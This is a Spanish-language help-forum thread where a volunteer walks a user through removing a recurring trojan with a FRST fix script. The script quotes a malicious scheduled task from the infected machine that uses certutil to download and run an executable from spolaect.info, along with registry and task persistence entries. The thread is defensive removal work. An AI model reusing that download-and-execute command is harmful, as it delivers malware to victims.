Trojan.MalPack.GS

Lo borro con Malwarebytes, pero cuando enciendo el pc vuelve. Dejo mi Additin.txt y FRST.txt

FRST.txt (26,4 KB)

Addition.txt (31,2 KB)

Hola @Elkks666 y bienvenido al foro

Te dejo algunos temas de interés y utilidad:

Te comento que en estos casos suele ser mejor o ayudar bastante el que pegues reportes de los programas (en este caso Malwarebytes). Aunque de momento puedo ver que tienes varias. Para asegurarnos que quede todo bien tendríamos que realizar varios pasos. Pero para no hacernos líos, vamos a hacerlo por partes.

Realiza lo siguiente:

:one: Crea una copia de seguridad del registro con Registry Backup, no importa si es la versión portable o instalable:

Tweaking Registry Backup

  • Después de instalar o descomprimir ejecuta el programa (de ser portable es el ejecutable TweakingRegistryBackup.exe).
  • Asegurate que en la pestaña Registry Backup este todo moarcado.
  • En Backup Name puedes dejarlo por defecto o asignar algún nombre
  • Presiona el botón BackUp now

:two: Deshabilita nuevamente tu antivirus: ¿Cómo deshabilitar temporalmente su Antivirus?

:three: En el equipo, con los demás programas cerrados abra el notepad; puede abrirlo en la barra de búsqueda de windows y escribiendo notepad.exe

Posteriormente, copie y pegue este script de reparación dentro del Notepad comenzando en Start y terminando en End:

Start
SystemRestore: On
CreateRestorePoint:
CloseProcesses:

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restricción <==== ATENCIÓN
HKU\S-1-5-21-771737515-3687490794-2116205075-1000\...\Run: [SolitaryRiver] => "C:\Windows\rss\csrss.exe" <==== ATENCIÓN
HKU\S-1-5-21-771737515-3687490794-2116205075-1000\...\MountPoints2: F - F:\setup.exe
HKU\S-1-5-21-771737515-3687490794-2116205075-1000\...\MountPoints2: {06f97853-6801-11eb-aa1f-d48564bf8f06} - F:\setup.exe
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restricción <==== ATENCIÓN
HKLM\SOFTWARE\Policies\Google: Restricción <==== ATENCIÓN
Task: {763DFB9C-2335-49A3-9611-4ABE5004A718} - System32\Tasks\{98E14A7B-8564-411E-83CA-F363B27F7966} => C:\Windows\system32\pcalua.exe -a F:\install.exe -d F:\
Task: {7FC258D1-6517-485E-A5C7-D760F4DEE72E} - System32\Tasks\AdvancedWindowsManager #5 => C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe <==== ATENCIÓN
Task: {8FA174E8-8ACD-4379-8533-978CB4E2A47F} - System32\Tasks\AdvancedWindowsManager #3 => C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe <==== ATENCIÓN
Task: {8FE13298-5258-4199-B7BF-1D1583D0B2CD} - System32\Tasks\AdvancedUpdater => C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe [1010800 2021-05-07] (Microleaves LTD -> AW Manager) <==== ATENCIÓN
Task: {91C1028C-2373-40F9-BE37-291752839FC3} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Joseba\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Joseba\AppData\Local\Temp\csrss\scheduled.exe /31340 -> /C certutil.exe -urlcache -split -f hxxps://spolaect.info/app/app.exe C:\Users\Joseba\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Joseba\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATENCIÓN
Task: {A5978FC9-8179-4E05-9DA2-DEBA24BB8713} - System32\Tasks\AdvancedWindowsManager #4 => C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe <==== ATENCIÓN
Task: {A7DF7D80-CBF0-417F-A520-BF9B5524E426} - System32\Tasks\AdvancedWindowsManager #1 => C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe <==== ATENCIÓN
Task: {AB28B90F-E0DC-42E5-97CD-79B95BD5CCAF} - System32\Tasks\AdvancedWindowsManager #6 => C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe <==== ATENCIÓN
Task: {D519E0C5-4E02-4970-A252-F85218694094} - System32\Tasks\Microsoft\Windows\Windows Error Reporting\SystemInfoTool => C:\Users\Joseba\AppData\Roaming\\sysinfotool\\sitool.exe <==== ATENCIÓN
Task: {D772A996-8CD0-4E9B-8D09-87F06940514F} - System32\Tasks\AdvancedWindowsManager #2 => C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe <==== ATENCIÓN
FF Plugin: @microsoft.com/GENUINE -> disabled [Ningún archivo]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Ningún archivo]
S2 AvastWscReporter; "C:\Program Files\Avast Software\Avast\wsc_proxy.exe" /runassvc /rpcserver [X]
R3 cpuz145; C:\Windows\temp\cpuz145\cpuz145_x64.sys [49968 2021-08-04] (CPUID -> CPUID)
S3 AscFileFilter; \??\C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscFileFilter.sys [X]
S3 AscRegistryFilter; \??\C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscRegistryFilter.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]
C:\Windows\rss
C:\Users\Joseba\AppData\Roaming\sysinfotool
C:\Users\Joseba\AppData\Local\Temp\csrss
C:\Windows\temp\cpuz145
2021-07-21 19:34 - 2021-07-21 19:34 - 000000000 ____D C:\Users\Joseba\AppData\Local\Yandex
2021-07-21 19:33 - 2021-08-03 23:40 - 000000000 ____D C:\Users\Joseba\AppData\Roaming\closestep
2021-07-21 19:33 - 2021-07-21 19:33 - 000000000 ____D C:\Users\Joseba\AppData\Roaming\Adzuvt
2021-07-21 19:14 - 2021-08-03 23:40 - 000000000 ____D C:\Users\Joseba\AppData\Local\netinfoapp
2021-07-21 19:01 - 2021-07-21 19:01 - 000000016 _____ C:\ProgramData\mntemp
2020-05-30 13:34 - 2020-05-30 13:34 - 000000000 _____ () C:\Users\Joseba\AppData\Local\{7472C90D-3210-41C9-BA10-B27DDF6EF072}
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Ningún archivo
BHO-x32: IObit Surfing Protection -> {BA0C978D-D909-49B6-AFE2-8BDE245DC7E6} -> C:\PROGRA~2\IObit\ADVANC~1\SURFIN~1\BROWER~1\ASCPLU~1.DLL => Ningún archivo
MSCONFIG\startupreg: Web Companion => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize 
FirewallRules: [{89FCFAC7-1D85-44BE-9081-9C303A762298}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe => Ningún archivo
FirewallRules: [{D94A6717-F520-41E6-B215-8218D9767B35}] => (Allow) C:\Program Files (x86)\MaskVPN\mask_svc.exe (Global Media (Thailand) Co., Ltd -> Global Media (Thailand) Co., Ltd)
FirewallRules: [{AFA6FC33-8CE3-4751-B9B6-E6A7ED430A85}] => (Allow) C:\Program Files (x86)\MaskVPN\MaskVPN.exe (Global Media (Thailand) Co., Ltd -> Global Media (Thailand) Co., Ltd)
FirewallRules: [{EE08F761-89BC-4DAE-B13D-E81042B1A4DB}] => (Allow) C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe (Global Media (Thailand) Co., Ltd -> Global Media (Thailand) Co., Ltd)
FirewallRules: [{7D34E6D9-62AB-4737-9096-B7FE63908BD3}] => (Allow) C:\Program Files (x86)\MaskVPN\tunnle.exe (Global Media (Thailand) Co., Ltd -> Global Media (Thailand) Co., Ltd)
FirewallRules: [{50EB481A-0011-4AD9-8E27-4D1A1DF6B15B}] => (Allow) C:\Windows\rss\csrss.exe => Ningún archivo
FirewallRules: [{86116611-5196-4623-A641-D851E5B572FD}] => (Allow) C:\Windows\rss\csrss.exe => Ningún archivo

CMD: ipconfig /flushdns
CMD: ipconfig /renew
CMD: bitsadmin /reset /allusers 
EmptyTemp:
Hosts:
End
  • Vaya a Archivo y selecciona Guardar Como.
  • En la parte de Codificación eliga Unicode o UTF8 según le de la opción.
  • Guardelo bajo el nombre de fixlist.txt en el escritorio al igual que FRST. Esto es muy importante.

¡:warning:ATENCIÓN! El anterior Script de reparación fue hecho específicamente por un miembro del Staff para este usuario, si tiene un problema similar por favor abra su propio tema para recibir ayuda personalizada. Usar Scripts de otros usuarios puede causar daños a su equipo

  • Ejecute Frst.exe. y presione el botón Fix / Corregir
  • Espere pacientemente a que termine y no use el equipo. Al terminar el equipo podría reiniciarse
  • La Herramienta guardara el reporte en su escritorio (Fixlog.txt).

:four: Desinstala el siguiente programa (puedes usar RevoUninstaller o cualquier medio):

  • Windows Manager

De manera adicional recomiendo desinstalar el siguiente programa si no te suena:

  • MaskVPN

Nos traerias:

  • El reporte de FRST (fixlog)
  • Comentarios de como te fue y como se encuentra el sistema.

Saludos